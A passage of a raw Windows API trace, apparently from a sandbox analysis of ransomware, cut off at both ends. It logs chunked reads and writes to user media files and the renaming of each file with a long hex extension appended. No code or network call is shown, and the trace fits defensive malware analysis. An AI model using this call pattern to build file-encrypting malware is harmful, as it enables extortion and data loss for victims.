returned 1 [0167.786] RtlInterlockedCompareExchange64 () returned 0x0 [0167.786] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.798] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0167.799] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav", lpString2=".480C5FF612AEA5C5120B71FB7B3324B8280985EEDFD776CD30EE96E2C0711B5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav.480C5FF612AEA5C5120B71FB7B3324B8280985EEDFD776CD30EE96E2C0711B5E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav.480C5FF612AEA5C5120B71FB7B3324B8280985EEDFD776CD30EE96E2C0711B5E" [0167.799] GetProcessHeap () returned 0x270000 [0167.799] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f9b00 [0167.799] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x72aff4c, FileInformation=0x42f9b00, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0167.800] CloseHandle (hObject=0x5a4) returned 1 [0167.802] GetProcessHeap () returned 0x270000 [0167.803] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.803] RtlInterlockedCompareExchange64 () returned 0x1 [0167.803] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.808] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.808] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.808] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.810] RtlInterlockedCompareExchange64 () returned 0x0 [0167.810] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.818] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.819] RtlInterlockedCompareExchange64 () returned 0x0 [0167.819] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.828] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.829] RtlInterlockedCompareExchange64 () returned 0x0 [0167.829] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.840] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76900b8, ReturnLength=0x72aff5c) returned 0x0 [0167.841] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3", lpString2=".4625382C4E4A6D6DE2860C381D0FD20C27086770C4B6514DA4B5FB12683BDB1B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3.4625382C4E4A6D6DE2860C381D0FD20C27086770C4B6514DA4B5FB12683BDB1B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3.4625382C4E4A6D6DE2860C381D0FD20C27086770C4B6514DA4B5FB12683BDB1B" [0167.841] GetProcessHeap () returned 0x270000 [0167.841] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x4332308 [0167.841] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x4332308, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0167.843] CloseHandle (hObject=0x598) returned 1 [0167.843] GetProcessHeap () returned 0x270000 [0167.844] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.851] RtlInterlockedCompareExchange64 () returned 0x1 [0167.852] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.855] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x75e00f8, ReturnLength=0x72aff5c) returned 0x0 [0167.856] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3", lpString2=".900C717B2E0D59BE8A0DC4AD2230C0BB99BABE83479511898909BD909AEFA247" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3.900C717B2E0D59BE8A0DC4AD2230C0BB99BABE83479511898909BD909AEFA247") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3.900C717B2E0D59BE8A0DC4AD2230C0BB99BABE83479511898909BD909AEFA247" [0167.856] GetProcessHeap () returned 0x270000 [0167.856] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4332440 [0167.856] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x72aff4c, FileInformation=0x4332440, Length=0x126, FileInformationClass=0xa) returned 0x0 [0167.858] CloseHandle (hObject=0x5b8) returned 1 [0167.859] GetProcessHeap () returned 0x270000 [0167.861] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0167.861] RtlInterlockedCompareExchange64 () returned 0x1 [0167.861] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.862] WriteFile (in: hFile=0x58c, lpBuffer=0x76282d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0) returned 1 [0167.863] RtlInterlockedCompareExchange64 () returned 0x0 [0167.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0168.394] ReadFile (in: hFile=0x5ac, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0168.406] WriteFile (in: hFile=0x5a4, lpBuffer=0x76282d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0) returned 1 [0168.407] RtlInterlockedCompareExchange64 () returned 0x0 [0168.407] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0169.323] ReadFile (in: hFile=0x5a4, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 1 [0169.328] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0169.336] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0169.337] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi", lpString2=".4A7E02EF29EB4CE1D54D610418168692EAED941B8BDAA7B6034046E986A08F24" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi.4A7E02EF29EB4CE1D54D610418168692EAED941B8BDAA7B6034046E986A08F24") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi.4A7E02EF29EB4CE1D54D610418168692EAED941B8BDAA7B6034046E986A08F24" [0169.337] GetProcessHeap () returned 0x270000 [0169.337] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x43331a8 [0169.337] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x43331a8, Length=0x122, FileInformationClass=0xa) returned 0x0 [0169.339] CloseHandle (hObject=0x5b0) returned 1 [0169.340] GetProcessHeap () returned 0x270000 [0169.341] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0169.347] RtlInterlockedCompareExchange64 () returned 0x1 [0169.347] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0169.350] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0169.351] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv", lpString2=".CFBCF710BEF672D8AE27E82350100C1993AAB4DA442C0A21390950FA18D02845" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv.CFBCF710BEF672D8AE27E82350100C1993AAB4DA442C0A21390950FA18D02845") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv.CFBCF710BEF672D8AE27E82350100C1993AAB4DA442C0A21390950FA18D02845" [0169.351] GetProcessHeap () returned 0x270000 [0169.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x43332e0 [0169.352] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x72aff4c, FileInformation=0x43332e0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0169.354] CloseHandle (hObject=0x5cc) returned 1 [0169.355] GetProcessHeap () returned 0x270000 [0169.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0169.360] RtlInterlockedCompareExchange64 () returned 0x1 [0169.360] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.232] ReadFile (in: hFile=0x5fc, lpBuffer=0x7779140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008) returned 1 [0170.232] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.238] WriteFile (in: hFile=0x5fc, lpBuffer=0x7779140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008) returned 1 [0170.240] RtlInterlockedCompareExchange64 () returned 0x0 [0170.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.241] NtQueryObject (in: Handle=0x5fc, ObjectInformationClass=0x1, ObjectInformation=0x77590b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x77590b8, ReturnLength=0x72aff5c) returned 0x0 [0170.243] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\IconCache.db", lpString2=".A1A9CC31DE2442FB9DF5A5994B8CC6F7BF1663340B2F19B3AB2E1408D8337355" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\IconCache.db.A1A9CC31DE2442FB9DF5A5994B8CC6F7BF1663340B2F19B3AB2E1408D8337355") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\IconCache.db.A1A9CC31DE2442FB9DF5A5994B8CC6F7BF1663340B2F19B3AB2E1408D8337355" [0170.243] GetProcessHeap () returned 0x270000 [0170.243] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x4334650 [0170.243] NtSetInformationFile (FileHandle=0x5fc, IoStatusBlock=0x72aff4c, FileInformation=0x4334650, Length=0x114, FileInformationClass=0xa) returned 0x0 [0170.244] CloseHandle (hObject=0x5fc) returned 1 [0170.245] GetProcessHeap () returned 0x270000 [0170.247] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.248] RtlInterlockedCompareExchange64 () returned 0x1 [0170.248] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.351] ReadFile (in: hFile=0x604, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 1 [0170.357] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.358] WriteFile (in: hFile=0x5cc, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0170.395] RtlInterlockedCompareExchange64 () returned 0x0 [0170.395] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.902] ReadFile (in: hFile=0x5b0, lpBuffer=0x78e1140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008) returned 1 [0170.903] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.914] WriteFile (in: hFile=0x5cc, lpBuffer=0x7909298*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160) returned 1 [0170.915] RtlInterlockedCompareExchange64 () returned 0x0 [0170.915] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.690] ReadFile (in: hFile=0x5f0, lpBuffer=0x75526e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8) returned 1 [0171.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.691] WriteFile (in: hFile=0x5dc, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0171.838] RtlInterlockedCompareExchange64 () returned 0xa [0171.838] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.894] ReadFile (in: hFile=0x5f4, lpBuffer=0x757a838, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700) returned 1 [0171.894] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.923] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x73e00f8, ReturnLength=0x72aff5c) returned 0x0 [0171.924] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpString2=".BB0A018A1F6A4DC5356C8A1FFCCB4D3D14BD67F26ED469B9154C601061010F50" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.BB0A018A1F6A4DC5356C8A1FFCCB4D3D14BD67F26ED469B9154C601061010F50") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.BB0A018A1F6A4DC5356C8A1FFCCB4D3D14BD67F26ED469B9154C601061010F50" [0171.924] GetProcessHeap () returned 0x270000 [0171.924] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4334778 [0171.924] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x4334778, Length=0x120, FileInformationClass=0xa) returned 0x0 [0171.926] CloseHandle (hObject=0x58c) returned 1 [0171.928] GetProcessHeap () returned 0x270000 [0171.931] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0171.940] RtlInterlockedCompareExchange64 () returned 0xb [0171.940] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.988] WriteFile (in: hFile=0x5f4, lpBuffer=0x757a838*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700) returned 1 [0171.989] RtlInterlockedCompareExchange64 () returned 0xa [0171.989] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.018] NtQueryObject (in: Handle=0x5fc, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x75aa0b8, ReturnLength=0x72aff5c) returned 0x0 [0172.019] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpString2=".D43BAE335ED8496E3AB6E5AF2E66293946BB36C1BD6471CD838B5929F7C5551B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.D43BAE335ED8496E3AB6E5AF2E66293946BB36C1BD6471CD838B5929F7C5551B") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.D43BAE335ED8496E3AB6E5AF2E66293946BB36C1BD6471CD838B5929F7C5551B" [0172.019] GetProcessHeap () returned 0x270000 [0172.019] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13e) returned 0x7418c00 [0172.019] NtSetInformationFile (FileHandle=0x5fc, IoStatusBlock=0x72aff4c, FileInformation=0x7418c00, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0172.060] CloseHandle (hObject=0x5fc) returned 1 [0172.061] GetProcessHeap () returned 0x270000 [0172.063] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0172.064] RtlInterlockedCompareExchange64 () returned 0xb [0172.064] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.065] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76900b8, ReturnLength=0x72aff5c) returned 0x0 [0172.066] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpString2=".D692B6E2E2C95E4F5AA4BFA67FB91D9725586614388FF69189D96EE904A60558" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.D692B6E2E2C95E4F5AA4BFA67FB91D9725586614388FF69189D96EE904A60558") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.D692B6E2E2C95E4F5AA4BFA67FB91D9725586614388FF69189D96EE904A60558" [0172.066] GetProcessHeap () returned 0x270000 [0172.066] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x7418d48 [0172.066] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x72aff4c, FileInformation=0x7418d48, Length=0x132, FileInformationClass=0xa) returned 0x0 [0172.068] CloseHandle (hObject=0x5dc) returned 1 [0172.070] GetProcessHeap () returned 0x270000 [0172.071] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0172.071] RtlInterlockedCompareExchange64 () returned 0xa [0172.071] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.071] NtQueryObject (in: Handle=0x5f0, ObjectInformationClass=0x1, ObjectInformation=0x7532658, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7532658, ReturnLength=0x72aff5c) returned 0x0 [0172.073] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpString2=".7998BE5AC3D5030D4CDA6E04EF4EDC32FF2DE75F5DF16286E8A46475B00CD32B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.7998BE5AC3D5030D4CDA6E04EF4EDC32FF2DE75F5DF16286E8A46475B00CD32B") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.7998BE5AC3D5030D4CDA6E04EF4EDC32FF2DE75F5DF16286E8A46475B00CD32B" [0172.073] GetProcessHeap () returned 0x270000 [0172.073] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x4333b68 [0172.073] NtSetInformationFile (FileHandle=0x5f0, 